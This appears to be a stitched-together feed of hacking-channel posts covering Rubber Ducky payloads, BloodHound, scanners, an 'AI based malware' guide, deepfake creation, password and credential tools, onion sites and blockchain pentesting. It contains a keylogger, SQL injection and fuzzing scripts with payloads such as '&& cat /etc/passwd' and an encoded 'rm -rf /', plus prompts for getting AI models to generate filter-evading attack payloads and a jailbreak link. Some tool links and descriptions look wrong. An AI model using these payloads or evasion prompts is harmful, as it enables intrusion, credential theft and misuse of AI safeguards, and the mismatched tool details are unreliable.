🦑 USB Rubber Ducky Payload

The [USB Rubber Ducky Payload Repository](https://github.com/hak5/usbrubberducky-payloads) by Hak5 provides a collection of ready-to-use payloads for the USB Rubber Ducky—a keystroke injection tool often used for penetration testing and red teaming. These payloads simulate fast and stealthy input for various exploits and tasks.

---

### GitHub Repository:
[Hak5 USB Rubber Ducky Payloads](https://github.com/hak5/usbrubberducky-payloads)

---

### Example Payload Structure:

#### Payload Documentation
All payloads start with comments that describe their purpose, author, target, and configuration.

REM Title: Example Payload
REM Author: Korben Dallas
REM Description: Opens hidden PowerShell
REM Target: Windows 10
REM Props: Hak5, Darren Kitchen
REM Version: 1.0
REM Category: General

---

#### Payload Example: URL Opening Script
This payload opens a URL after a brief delay.

BEGINNING OF PAYLOAD

REM CONFIGURATION
REM REQUIRED - Provide URL
DEFINE #MY_TARGET_URL example.com

REM OPTIONAL - Set boot delay; default is 5 seconds
DEFINE #BOOT_DELAY 5000

DELAY #BOOT_DELAY

STRING start chrome.exe #MY_TARGET_URL
ENTER

---

### Features:
1. Preconfigured Payloads:
- Password exfiltration
- Reverse shells
- Network reconnaissance
- Drive-by downloads

2. Customizable Payloads:
- DEFINE statements for reusable parameters.
- DELAY statements to time operations precisely.

3. Cross-Platform Targeting:
- Payloads can be customized for Windows, macOS, and Linux.

---

### Key Payload Categories:
1. Information Gathering:
- Automated reconnaissance.
- Exporting network details.

2. Exploitation:
- Privilege escalation.
- Exploiting vulnerabilities via automated commands.

3. Post-Exploitation:
- Extracting data or installing backdoors.

4. Social Engineering:
- Simulating user activity or spoofing actions.

---

### Notable Use Case:
#### Hidden PowerShell Script Execution

REM Title: Hidden PowerShell Execution
REM Author: Hak5
REM Description: Launches a hidden PowerShell instance.
REM Target: Windows 10
REM Category: Post-Exploitation

DELAY 5000
STRING powershell -windowstyle hidden
ENTER

---

### Usage:
1. Select a payload from the repository.
2. Edit the payload as per your target's configuration.
3. Load the payload onto the USB Rubber Ducky.
4. Deploy and execute the payload by plugging it into the target system.

This repository is a must-have for penetration testers aiming to automate tasks, test security defenses, or explore advanced attack vectors. Ensure proper authorization when using these tools.

🦑Game changer. Microsoft open-sourced bitnet.cpp, you can now run 100B LLMs locally without a GPU needed.

The framework quantizes LLMs to 1-bit precision and runs inference directly on CPUs, making large language models accessible on standard hardware.

Technical details:
▸ Forked from llama.cpp with optimizations for 1-bit inference
▸ Handles models up to 100B parameters locally
▸ Achieves 6.17x speedup compared to standard inference
▸ Reduces energy consumption by 82.2%
▸ Works on standard CPUs without specialized hardware

Repo: https://lnkd.in/guEhH8ad
↓
Are you an AI developer? Check out https://AlphaSignal.ai to get a daily summary of breakthrough models, repos and papers in AI. Read by 200,000+ devs.

🦑Monitoring: BloodHound is a powerful tool for analyzing and visualizing Active Directory environments. It assists penetration testers and system administrators in identifying weak permissions, potential attack paths, and privilege escalation opportunities within a Windows domain.

---

### GitHub Repository:
[BloodHound GitHub](https://github.com/BloodHoundAD/BloodHound)

---

### Features:
1. Active Directory Enumeration:
- Maps domain trust relationships.
- Identifies paths to high-value targets like Domain Admins.
- Highlights risky ACLs and misconfigurations.

2. Graph Visualization:
- Displays a clear graph of domain objects and their relationships.
- Uses queries to highlight exploitable paths and vulnerabilities.

3. Neo4j Database Integration:
- Stores collected AD data for analysis.
- Allows querying via Cypher language for complex insights.

4. Cross-Platform Support:
- Runs on Windows, macOS, and Linux.

---

### Use Cases:
1. Privilege Escalation:
- Identifies attack paths from low-privileged users to domain administrators.

2. Lateral Movement:
- Maps routes through machines, groups, and users for lateral traversal.

3. Audit & Mitigation:
- Assists administrators in identifying weak spots and tightening security.

---

### How It Works:
1. Data Collection:
Use SharpHound, the data collector, to gather information from the domain.

Example:

   SharpHound.exe -c All
   

This collects data about users, groups, permissions, trusts, and ACLs.

2. Data Import:
Import the collected JSON files into BloodHound.

3. Querying:
Use predefined or custom Cypher queries to identify attack paths.

Example Query:

   MATCH (n:User {name:"John"})-[r:AdminTo]->(m:Computer) RETURN n,m
   

This finds all computers where "John" has administrative rights.

---

### Visualization Example:
A graphical representation might show:
- Nodes: Users, groups, computers, and domains.
- Edges: Relationships like group memberships, session hosts, and admin rights.

---

### Installation:
1. Neo4j Database:
- Download and install from [Neo4j](https://neo4j.com/).
- Start the database service.
2. BloodHound:
- Clone the repository or download the release binaries.
- Run the BloodHound GUI.

---

### Additional Tools:
- SharpHound: Data collection tool for Windows environments.
- AzureHound: Gathers data for Azure AD.

This tool is essential for auditing AD security and simulating attacker behavior in penetration testing engagements.

🦑 all-in-one toolkit Scanners-Box

Description: Scanners-Box is an all-in-one toolkit that consolidates various scanning utilities for penetration testers, security analysts, and system administrators. It helps with network reconnaissance, vulnerability assessment, and information gathering. The framework simplifies the management and execution of multiple scanning tools in a unified environment.

---

### GitHub Repository:
[Scanners-Box GitHub](https://github.com/We5ter/Scanners-Box)

---

### Features:
1. Comprehensive Scanning Tools:
- Includes tools for port scanning, vulnerability assessment, subdomain enumeration, and more.
- Aggregates commonly used scanners like Nmap, Nikto, and masscan.

2. Modular Design:
- Flexible configuration allows adding custom tools and scripts.
- Easily integrates new scanning functionalities.

3. Automation:
- Automates repetitive scanning tasks.
- Batch scanning capabilities for multiple targets.

4. Cross-Platform Support:
- Works on Windows, Linux, and macOS systems.

5. Custom Scripts:
- Leverages Python and bash scripts for tailored tasks.

---

### Use Cases:
1. Port and Service Scanning:
- Quickly identify open ports and running services on target systems.

2. Subdomain Enumeration:
- Gather subdomains and perform DNS resolution checks.

3. Web Server Vulnerability Scanning:
- Analyze web servers for known vulnerabilities using integrated tools like Nikto.

4. Network Reconnaissance:
- Map out networks and identify potential entry points for further exploitation.

5. Vulnerability Assessment:
- Assess the security posture of networks and web applications.

---

### Key Tools Included:
1. Port Scanners:
- Nmap
- masscan
- unicornscan

2. Vulnerability Scanners:
- Nikto
- OpenVAS
- wapiti

3. Web Application Scanners:
- w3af
- Arachni
- Burp Suite integration

4. Subdomain Enumeration:
- Sublist3r
- Amass
- assetfinder

5. DNS and OSINT:
- dnsenum
- theHarvester

---

### Installation:
1. Clone the repository:

   git clone https://github.com/We5ter/Scanners-Box.git
   

2. Navigate to the directory:

   cd Scanners-Box
   

3. Run the setup script:

   bash install.sh
   

---

### Example Usage:
- Subdomain Scanning:

  python3 subdomain.py --target example.com
  

- Port Scanning with Nmap:

  python3 nmap_scan.py --target 192.168.1.1
  

- Vulnerability Scanning:

  python3 nikto_scan.py --target example.com
  

---

### Advantages:
- Consolidates multiple tools in one framework.
- Reduces setup time for scanning tasks.
- Easily customizable and extendable.

This toolkit is invaluable for quickly setting up comprehensive scans in penetration testing and vulnerability assessment workflows.

Automated Collection of Vulnerabilities and Their Fixes from Open-Source Software

https://github.com/secureIT-project/CVEfixes

🦑 Creating AI based Malware

Creating and Solving Challenges with AI Safeguards

Before proceeding, it's crucial to highlight that creating malware, participating in malicious activities, or circumventing ethical guidelines is against responsible and lawful use of technology.


### Step-by-Step Approach to Solve AI-based s

#### 1. Understand the Challenge Context:
- Category: Identify if it's reverse engineering, binary exploitation, web exploitation, cryptography, or malware analysis.
- Analyze the Objective: Read the challenge carefully to determine what needs to be achieved (e.g., decode, extract, or manipulate).

#### 2. Leverage AI for Analysis:
Use AI-based tools to analyze or automate repetitive tasks:
- Binary Analysis: Use frameworks like Ghidra or Radare2 for reverse engineering.
- Automate Patterns: Leverage Python with AI libraries like OpenAI or TensorFlow for pattern recognition or automated testing.

#### 3. Code Malware-like Behavior (Legally for Educational Purposes):
When solving a , you may encounter situations mimicking malware functionality:
- Payload Analysis: Decrypt encoded payloads using tools like CyberChef.
- Code Automation:
- Example: Create a keylogger (for analysis, NOT deployment):

       from pynput import keyboard

       def on_press(key):
           try:
               print(f"Key {key.char} pressed")
           except AttributeError:
               print(f"Special key {key} pressed")

       with keyboard.Listener(on_press=on_press) as listener:
           listener.join()
       

#### 4. Exploit Development:
- Use tools like Metasploit or custom scripts to simulate the exploitation phase.
- Example of a buffer overflow simulation (basic concept):

     import socket

     target_ip = "127.0.0.1"
     target_port = 9999
     payload = b"A" * 1024  # Overflow buffer size

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((target_ip, target_port))
     s.send(payload)
     s.close()
     

#### 5. AI-assisted Malware Analysis:
- Dynamic Analysis: Use sandboxing tools like Cuckoo Sandbox to observe malware behavior in a controlled environment.
- Static Analysis: Utilize AI models to classify potential threats from a binary.

#### 6. Reverse Engineer the Challenge:
- Use tools like IDA Pro or Binary Ninja to decompile and analyze binaries.
- Example: Identifying a hardcoded key in a binary:
- Use Ghidra to navigate to the main function and identify key variables.

#### 7. Test with Custom AI Scripts:
Automate solving repetitive tasks:
- Password Cracking:
- Use AI to brute force or pattern match probable passwords.
- Example: Use hashcat for password recovery.

- Web Exploitation:
- Automate SQL injection:

       import requests

       target_url = "http://example.com/login"
       payload = {"username": "' OR 1=1 --", "password": ""}
       response = requests.post(target_url, data=payload)
       print(response.text)
       

#### 8. Validate and Optimize:
- Use AI tools to simulate attack scenarios and validate success.
- Example: Use machine learning models for detecting evasion in traffic.

---

### Recommendations and Guidelines:
- Focus on solving s ethically and using skills for legitimate purposes like penetration testing or cybersecurity research.
- Follow rules to ensure fair play and improve your knowledge responsibly.
- Leverage tools like AI models for accelerating repetitive tasks, but always align their use with ethical guidelines.

If you’re facing specific challenges in a , feel free to describe them, and I'll help guide you through solving them!

🦑 Example AI Filter Bypass

Ai gives us prompts to bypass his filters🫠

Crafting prompts or solutions to bypass ethical filters in a scenario requires careful handling to ensure compliance with ethical guidelines, lawful practices, and the intended educational purposes of the challenge. Here's how to approach solving s using AI responsibly:

---

### 1. Understand the Challenge
- Identify Filters: What type of filter or protection is in place? (e.g., WAF, input validation, rate limits).
- Analyze the Scope: Are you working with web input, network traffic, or system-level constraints?

---

### 2. AI-Assisted Prompts for Analysis
Leverage AI tools like ChatGPT, GPT-4, or custom LLMs to assist in analyzing and solving . Below are ethical and focused prompts:

#### Input Validation or WAF Bypass
- Prompt:
- *"Generate a list of obfuscated SQL payloads to test input validation mechanisms, ensuring they align with ethical penetration testing practices."*
- *"How can I encode payloads to bypass basic web filters while remaining within educational use?"*

#### Payload Generation for Testing
- Prompt:
- *"What are effective URL-encoding methods to test a web application's XSS filter?"*
- *"Explain how base64 encoding can be applied to payloads for safe testing of filters in s."*

#### Analyzing Network or Application Behavior
- Prompt:
- *"Suggest methods to analyze rate-limiting strategies in a web application during a ."*
- *"What are common header manipulations that can help test a web firewall in a controlled environment?"*

---

### 3. Practical AI-Assisted Payload Creation
Below are some examples of payloads and bypass techniques for testing in s, ensuring lawful use:

#### SQL Injection (Obfuscated Inputs)
- AI-generated prompt:
*"Craft an SQL injection payload that uses hex encoding or alternative comment syntax to bypass basic filters."*
- Example:

  ' OR 1=1;-- 
  

#### XSS (Input Sanitization Bypass)
- AI-generated prompt:
*"Provide an XSS payload that utilizes uncommon attributes or event handlers to bypass sanitization filters."*
- Example:

  <img src="x" onerror="alert('')">
  

#### Command Injection (Encoding Payloads)
- AI-generated prompt:
*"Explain how to encode command injection payloads to evade simple validation mechanisms."*
- Example:

  ; ls -la;
  

---

### 4. AI-Assisted Automation
#### Testing HTTP Parameters
- Prompt:
*"Generate Python code for fuzzing HTTP parameters using a predefined payload list in a environment."*
- Code:

  import requests

  target_url = "http://example.com/vulnerable-endpoint"
  payloads = ["' OR 1=1 --", "<script>alert(1)</script>", "&& cat /etc/passwd"]

  for payload in payloads:
      response = requests.get(target_url, params={"input": payload})
      print(f"Payload: {payload}, Response: {response.status_code}")
  

#### AI-Based Encoding
- Prompt:
*"Explain how to encode attack payloads using techniques like URL encoding or base64 to test input filters."*
- Code Example:

  import base64

  payload = "rm -rf /"
  encoded_payload = base64.b64encode(payload.encode()).decode()
  print(f"Encoded Payload: {encoded_payload}")
  

---

### 5. Top AI Prompts for Problem-Solving in s
Here are adaptable prompts for specific challenges:
1. Input Validation Bypass:
*"What are common bypass techniques for input validation using encoding, transformations, or special characters?"*
2. Filter Detection:
*"How can I use timing analysis to detect the presence of a web application firewall in a setting?"*
3. Automation Strategies:
*"Provide a Python script for automating brute-force testing of input fields while respecting ethical boundaries."*
4. Reverse Engineering Assistance:
*"Explain how to identify hardcoded secrets in a binary file using reverse engineering tools."*
5. Advanced Obfuscation:
*"What are creative ways to obfuscate payloads for educational while maintaining execution?"*

---

🦑Useful ChatGPT prompts

https://github.com/f/awesome-chatgpt-prompts/blob/main/prompts.csv

🦑 Setup a 2024 Drupal vulnerability:

After installing the drupal application the developer can change the hash_salt variable on line 268 in the /sites/default/settings.php file. As advised in the example the developer can use a file for this by using the file_get_contents function:

If this is set to a file with a salt string in it the application works as intended. However if this is set to an empty file or a file that doesn’t exist. It could be that this file it was set to gets deleted, removed or renamed after some time. This will break the website. As an example the following code can be used as recommended in the image

Now if this file gets removed the application breaks and the full path traversal is shown by navigating to /core/authorize.php as is shown in the image.

Universal AI Jailbreak SMASHES GPT4, Claude, Gemini, LLaMA

https://youtu.be/9IM5d-egZ7M

🦑xx Deep Fake Videos Notes :

---

How Deepfakes Are Created:

#### 1. Understanding Deepfakes
Deepfakes are AI-generated videos or images where someone's face or voice is swapped or synthesized using machine learning techniques. They are often made with deep learning algorithms, particularly Generative Adversarial Networks (GANs) or autoencoders.

---

#### 2. Tools and Technologies Used
Creating deepfakes involves the following tools:

- DeepFaceLab: The most popular open-source tool for creating deepfake videos.
- FaceSwap: Another open-source tool with a user-friendly interface.
- First-Order Motion Model: Generates animations using reference images and motion vectors.
- DeepFakeGenerator: Often used for quick results with less control over quality.

---

#### 3. The Process
1. Collect Data:
- Gather high-quality video/images of the target (person to fake).
- More data = better quality. Include various angles and expressions.

2. Preprocessing:
- Detect and extract the face from all frames using facial recognition tools.
- Tools like dlib, MTCNN, or OpenCV can help with this.
- Align and normalize the faces to make them consistent.

3. Train the Model:
- Use an autoencoder or GAN-based model to train on the extracted faces.
- The model learns to replicate and map the source face onto the target face.
- Training can take days or weeks, depending on hardware and dataset size.

4. Face Swapping:
- Once trained, the model generates fake frames with the source face mapped onto the target video.

5. Postprocessing:
- Use video editing tools to blend the fake face seamlessly with the target.
- Adjust lighting, shadows, and other effects for realism.

6. Generate the Final Output:
- Combine the processed frames back into a video.

---

#### 4. Ethical Considerations
The challenge might also require discussing:
- The risks of misuse, such as in disinformation or explicit content.
- Legal and ethical implications.
- Techniques to detect and prevent deepfakes (e.g., AI-based detection algorithms).

---

#### Sample Code for Basics
Here's a simplified Python example using OpenCV to detect and align faces:

import cv2

# Load pre-trained face detection model
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')

# Read the image
image = cv2.imread('source_image.jpg')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

# Detect faces
faces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)

# Draw rectangles around faces
for (x, y, w, h) in faces:
    cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 2)

cv2.imshow('Detected Faces', image)
cv2.waitKey(0)
cv2.destroyAllWindows()

---

### Key Points to Include
- Explain how GANs or autoencoders are essential for deepfake creation.
- Provide examples of tools like DeepFaceLab or code snippets (if allowed).
- Address ethical challenges.

This guide is for educational purposes only.🙂

🦑Cryptographic operations:

---

### 1. [libsodium](https://github.com/jedisct1/libsodium)
- Description: A modern, easy-to-use crypto library designed for security and performance.
- Features:
- Symmetric encryption (secretbox)
- Public-key encryption (box)
- Key derivation, signing, hashing, and random number generation
- Use Case: General-purpose cryptographic operations.

---

### 2. [age](https://github.com/FiloSottile/age)
- Description: A simple, modern, and secure encryption tool.
- Features:
- Designed for encrypting files with minimal configuration.
- Supports passphrases and SSH keys for decryption.
- Use Case: File encryption and secure file sharing.

---

### 3. [PyCryptodome](https://github.com/Legrandin/pycryptodome)
- Description: A self-contained Python package for cryptography.
- Features:
- Symmetric ciphers (AES, ChaCha20, etc.)
- Public-key algorithms (RSA, DSA, ECC)
- Cryptographic hashes (SHA, MD5)
- Use Case: Building encryption into Python applications.

---

### 4. [OpenSSL](https://github.com/openssl/openssl)
- Description: A robust toolkit for SSL/TLS protocols and general-purpose cryptography.
- Features:
- Encryption/decryption using symmetric and asymmetric algorithms.
- SSL/TLS implementation.
- Extensive support for various cipher suites.
- Use Case: Secure communication and application-level encryption.

---

### 5. [Tink](https://github.com/google/tink)
- Description: A multi-language, cross-platform library for cryptographic operations by Google.
- Features:
- Simplified APIs for common cryptographic use cases.
- High-level encryption, decryption, and key management.
- Use Case: Easy-to-use cryptographic operations for developers.

---

### 6. [VeraCrypt](https://github.com/veracrypt/VeraCrypt)
- Description: Disk encryption software based on TrueCrypt.
- Features:
- Full-disk encryption with advanced security features.
- Support for hidden volumes.
- Use Case: Secure storage of sensitive data.

---

### 7. [cryptography](https://github.com/pyca/cryptography)
- Description: A Python library that provides cryptographic recipes and primitives.
- Features:
- Symmetric and asymmetric encryption.
- X.509 certificate parsing.
- Secure random number generation.
- Use Case: Secure data transmission and application-layer encryption in Python.

---

### 8. [GPG](https://github.com/gpg/gnupg)
- Description: The GNU Privacy Guard, an implementation of OpenPGP.
- Features:
- Encrypt and sign data and communications.
- Key management and public key encryption.
- Use Case: Encrypting emails and files securely.

---

### 9. [rnp](https://github.com/rnpgp/rnp)
- Description: OpenPGP library and CLI tool compatible with GPG.
- Features:
- Encrypting, decrypting, signing, and verifying messages.
- Key generation and management.
- Use Case: OpenPGP encryption in modern applications.

---

### 10. [NaCl (Networking and Cryptography Library)](https://github.com/libsodium/libsodium)
- Description: A low-level cryptography library offering high-performance cryptographic primitives.
- Features:
- Public-key, secret-key, and hash-based cryptographic operations.
- Focus on simplicity and security.
- Use Case: Performance-focused cryptographic solutions.

---

### 11. [CryFS](https://github.com/cryfs/cryfs)
- Description: Cryptographic filesystem for securing cloud storage.
- Features:
- Transparent file encryption.
- Data integrity verification.
- Use Case: Encrypting files in cloud storage services like Dropbox or Google Drive.

---

### 12. [sops](https://github.com/mozilla/sops)
- Description: A tool for managing secrets with encryption.
- Features:
- Encrypts files using AWS KMS, GCP KMS, Azure Key Vault, or PGP.
- Supports YAML, JSON, ENV, and INI files.
- Use Case: Secure storage of configuration files and secrets.

Exploiting 70% of Windows Machines With IPv6 Vulnerability:

https://youtu.be/r-fqJaHRoHs

🦑Top Decryption Tools 2024-2025:

---

1. CyberChef(https://github.com/gchq/CyberChef)
- Description: A web-based "Cyber Swiss Army Knife" for encryption, decryption, and data manipulation.
- Features:
- Decrypts data encoded with base64, XOR, AES, etc.
- Includes hash crackers and forensic analysis tools.
- Use Case: Universal tool for decryption and data transformation.

---

2. John the Ripper(https://github.com/openwall/john)
- Description: A password cracker supporting numerous encryption formats.
- Features:
- Cracks hashed passwords using brute force and dictionary attacks.
- Supports MD5, SHA, DES, Blowfish, and more.
- Use Case: Decrypting password hashes for security assessments.

---

3. hashcat(https://github.com/hashcat/hashcat)
- Description: An advanced GPU-based password recovery tool.
- Features:
- Supports over 300 hash and encryption algorithms.
- Custom rule sets for password recovery.
- Use Case: Decrypting and recovering encrypted passwords.

---

4. Ciphey(https://github.com/Ciphey/Ciphey)
- Description: Automated decryption tool that uses AI and natural language processing.
- Features:
- Detects encryption methods automatically.
- Decodes ciphertext into human-readable text.
- Use Case: Quick decryption of unknown encrypted data.

---

5. GPG (GNU Privacy Guard)(https://github.com/gpg/gnupg)
- Description: Decrypts data encrypted with the OpenPGP standard.
- Features:
- Decrypts and verifies encrypted emails, files, and data.
- Key management and multi-platform compatibility.
- Use Case: Decrypting communications and files in OpenPGP format.

---

6. OpenSSL(https://github.com/openssl/openssl)
- Description: A toolkit for SSL/TLS protocols with decryption capabilities.
- Features:
- Decrypts SSL/TLS traffic (with private keys).
- Decrypts data encrypted with OpenSSL algorithms.
- Use Case: Secure communication decryption and data recovery.

---

7. decrypt-wpa(https://github.com/mcgrew/decrypt-wpa)
- Description: Tool for decrypting WPA traffic with a known PSK (pre-shared key).
- Features:
- Supports WPA2 capture decryption using Wireshark-compatible files.
- Packet-by-packet decryption.
- Use Case: Analyzing and decrypting WPA-encrypted network traffic.

---

8. CrackStation(https://github.com/CrackStation/crackstation-wordlist)
- Description: A massive password decryption tool using precomputed hash dictionaries.
- Features:
- Decrypts MD5, SHA-1, and other hash formats.
- Includes a comprehensive wordlist for hash matching.
- Use Case: Hash decryption and penetration testing.

---

9. bcrypt-tool(https://github.com/rg3/bcrypt-tool)
- Description: A command-line utility to decrypt bcrypt-encrypted passwords.
- Features:
- Uses brute-force and dictionary attacks for bcrypt hashes.
- High-performance decryption with GPU support.
- Use Case: Decrypting bcrypt-protected passwords.

---

10. Mimikatz(https://github.com/gentilkiwi/mimikatz)
- Description: A popular tool for extracting plaintext passwords and keys from memory.
- Features:
- Decrypts Windows credentials from memory (LSASS process).
- Extracts Kerberos tickets and NTLM hashes.
- Use Case: Forensic and penetration testing to decrypt sensitive credentials.

---

11. Hash-Identifier(https://github.com/blackploit/hash-identifier)
- Description: Identifies the type of hash and prepares for decryption.
- Features:
- Recognizes over 200 hash types.
- Prepares data for tools like John the Ripper or hashcat.
- Use Case: Pre-decryption hash identification.

---

12. AES Crypt(https://github.com/paulej/AESCrypt)
- Description: A file encryption and decryption tool using AES-256.
- Features:
- Command-line interface for secure decryption.
- Cross-platform compatibility.
- Use Case: Secure file decryption for personal and business use.

---

🦑 Dark Web Online sites List:

Email Providers
Cock.li xdkriz6cn2avvcr2vks5lvvtmfojz2ohjzj4fhyuka55mvljeso2ztqd.onion

Elude.in eludemailxhnqzfmxehy3bk5guyhlxbunfyhkcksv4gvx6d3wcf6smad.onion

Sonar Tor Messenger sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion

ProtonMail protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion

RiseUp Email 5gdvpfoh6kb2iqbizb37lzk2ddzrwa47m6rpdueg2m656fovmbhoptqd.onion

Blogs And Personal Sites
qorg11.net lainwir3s4y5r7mqm3kurzpljyf77vty2hrrfkps6wm4nnnqzest4lqd.onion

Course Enigma cgjzkysxa4ru5rhrtr6rafckhexbisbtxwg2fg743cjumioysmirhdad.onion

Kill-9 killnod2s77o3axkktdu52aqmmy4acisz2gicbhjm4xbvxa2zfftteyd.onion

Digdeeper digdeep4orxw6psc33yxa2dgmuycj74zi6334xhxjlgppw6odvkzkiad.onion

Spware Watchdog spywaredrcdg5krvjnukp3vbdwiqcv3zwbrcg6qh27kiwecm4qyfphid.onion

MayVaneDay Studios meynethaffeecapsvfphrcnfrx44w2nskgls2juwitibvqctk2plvhqd.onion

Shadow Wiki zsxjtsgzborzdllyp64c6pwnjz5eic76bsksbxzqefzogwcydnkjy3yd.onion

Outer Space reycdxyc24gf7jrnwutzdn3smmweizedy7uojsa7ols6sflwu25ijoyd.onion

Tech Learning Collective lpiyu33yusoalp5kh3f4hak2so2sjjvjw5ykyvu2dulzosgvuffq6sad.onion

Fuwa Fuwa fwfwqtpi2ofmehzdxe3e2htqfmhwfciwivpnsztv7dvpuamhr72ktlqd.onion

S-Config xjfbpuj56rdazx4iolylxplbvyft2onuerjeimlcqwaihp3s6r4xebqd.onion
 
Hacking
Defcon g7ejphhubv5idbbu3hb3wawrs5adw7tkx7yjabnf65xtzztgg4hcsqqd.onion

InfoCon w27irt6ldaydjoacyovepuzlethuoypazhhbot6tljuywy52emetn7qd.onion
 
News Sites
ProPublica p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion
Darknetlive darkzzx4avcsuofgfez5zq75cqc4mprjvfqywo45dfcaxrwqg6qrlfid.onion
 
Open Source Software
OnionShare lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion

Whonix dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion

Qubes OS www.qubesosfasa4zl44o4tws22di6kepyzfeqv3tg4e3ztknltfxqrymdad.onion

Keybase.IO keybase5wmilwokqirssclfnsqrjdsi7jdir5wy7y7iu3tanwmtp6oid.onion

Bitcoin Core 6hasakffvppilxgehrswmffqurlcjjjhd76jgvaqmsg6ul25s7t3rzyd.onion

Wasabi Wallet wasabiukrxmkdgve5kynjztuovbg43uxcbcxn6y2okcrsg7gb6jdmbad.onion

The Tor Project 2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion
 
Others
CIA.gov ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion

Internet Archive archivebyd3rzt3ehjpm4c3bjkyxv3hjleiytnvxcn7x32psn2kxcuid.onion

Bible4u bible4u2lvhacg4b3to2e2veqpwmrc2c3tjf2wuuqiz332vlwmr4xbad.onion

Imperial Library kx5thpx2olielkihfyo4jgjqfb7zx7wxr3sd4xzt26ochei4m6f7tayd.onion

Comic Book Library nv3x2jozywh63fkohn5mwp2d73vasusjixn3im3ueof52fmbjsigw6ad.onion

Tor Paste torpastezr7464pevuvdjisbvaf4yqi4n7sgz7lkwgqwxznwy5duj4ad.onion

Fuck Facebook 4wbwa6vcpvcr3vvf4qkhppgy56urmjcj2vagu2iqgp3z656xcmfdbiqd.onion

Just Another Library libraryfyuybp7oyidyya3ah5xvwgyix6weauoini7zyz555litmmumad.onion

Google Feud lkqx6qn7whctpdjhcoohpoyi6ahtrveuii7kq2m647ssvo5skqp7ioad.onion

NCIDE Police Task Force ncidetfs7banpz2d7vpndev5somwoki5vwdpfty2k7javniujekit6ad.onion

🦑Ethereum Hacking:

Mythril for Smart Contracts (Ethereum)
If you want to explore Mythril's use cases (Ethereum-focused):
1. Install Mythril:

   pip install mythril
   

2. Run Mythril to analyze a smart contract:

   myth analyze contract.sol
   

3. Detect vulnerabilities in bytecode:

   myth analyze --rpc http://127.0.0.1:8545 -a <CONTRACT_ADDRESS>
   

---

### Commands for Bitcoin Pentesting
Bitcoin pentesting would rely on tools and methods such as analyzing P2SH scripts, transaction structures, and wallet vulnerabilities. Below are specific actionable commands/tools:

#### 1. Bitcoin Script Analysis
Use bitcoin-cli to decode and analyze scripts:

   bitcoin-cli decodescript <HEX_SCRIPT>
   

#### 2. Transaction Vulnerability Analysis
Decode raw transactions:

   bitcoin-cli decoderawtransaction <RAW_TX>
   

#### 3. Wallet Testing
Test wallets using libraries like btcpy:

   from btcpy.structs.transaction import Transaction
   tx = Transaction.deserialize(<RAW_TX>)
   print(tx)
   

#### 4. Cross-Site Blockchain Vulnerabilities
Automate REST API pentesting for wallets or blockchain explorers:

   sqlmap -u "http://blockchainexplorer.com/api?query=*" --dbs
   

#### 5. Custom Scripts for Exploits
Create Bitcoin raw transactions with custom scripts:

   bitcoin-cli createrawtransaction '[{"txid":"<TXID>","vout":<INDEX>}]' '{"<ADDRESS>":<AMOUNT>}'
   

---

### Mythril-like Analysis for Bitcoin Alternatives
1. Analyze multisig transactions for bugs:

   bitcoin-cli validateaddress <ADDRESS>
   

2. Debug SegWit scripts:

   bitcoin-cli decodescript <HEX_SCRIPT>
   

3. Use btcd or other libraries to craft transactions:
`bash
go run btcd_tx_tool.go

This post is made for educational purposes

🦑Top Free Local AI

Open LLM Leaderboard 


https://huggingface.co/collections/open-llm-leaderboard/open-llm-leaderboard-best-models-652d6c7965a4619fb5c27a03

🦑 AI models and tools for cybersecurity and hacking research

1. Code Analysis and Security Tools
- CodeBERT: AI model for secure code analysis.
URL: [https://huggingface.co/microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base)
- DeepCode by Snyk: Detects vulnerabilities in codebases.
URL: [https://www.deepcode.ai/](https://www.deepcode.ai/)
- Joern: Open-source code analysis tool designed for vulnerability discovery.
URL: [https://joern.io/](https://joern.io/)

2. Adversarial Models and Simulations
- DeepExploit: Automates penetration testing with AI-driven attacks.
URL: [https://github.com/13o-bbr-bbq/machine_learning_security](https://github.com/13o-bbr-bbq/machine_learning_security)
- TextAttack: Framework for generating adversarial text for NLP systems.
URL: [https://github.com/QData/TextAttack](https://github.com/QData/TextAttack)
- Foolbox: Test the robustness of AI models with adversarial inputs.
URL: [https://foolbox.readthedocs.io/](https://foolbox.readthedocs.io/)

3. Malware Detection and Threat Intelligence
- MalConv: Neural network for malware detection from raw binaries.
URL: [https://github.com/Endermanch/MalwareDatabase](https://github.com/Endermanch/MalwareDatabase)
- Cuckoo Sandbox AI: Analyze malware behavior with AI integration.
URL: [https://cuckoosandbox.org/](https://cuckoosandbox.org/)
- Viper Framework: Malware and binary analysis toolset.
URL: [https://github.com/viper-framework/viper](https://github.com/viper-framework/viper)

4. Image and Data Analysis Tools
- YOLO (You Only Look Once): Detect anomalies or objects in visual data.
URL: [https://github.com/ultralytics/yolov5](https://github.com/ultralytics/yolov5)
- AutoML Vision by Google: Train custom vision models for detecting tampering.
URL: [https://cloud.google.com/automl](https://cloud.google.com/automl)

5. Network and System Monitoring Tools
- SnortAI: Intrusion detection with machine learning enhancements.
URL: [https://www.snort.org/](https://www.snort.org/)
- Zeek AI (Bro): Network analysis framework extended with AI.
URL: [https://zeek.org/](https://zeek.org/)
- DeepPacket: AI-driven analysis of network packet data.
URL: [https://github.com/xiaokexiang/DeepPacket](https://github.com/xiaokexiang/DeepPacket)

6. General Security Tools with AI Features
- TriageML: Machine learning for automating malware triage.
URL: [https://github.com/fireeye/Triage](https://github.com/fireeye/Triage)
- AI-Hunter: AI-driven platform for detecting and investigating cyber threats.
URL: [https://www.criticalstart.com/ai-hunter/](https://www.criticalstart.com/ai-hunter/)
- ELK Stack with AI: Integrate AI plugins with the ELK Stack for advanced threat detection.
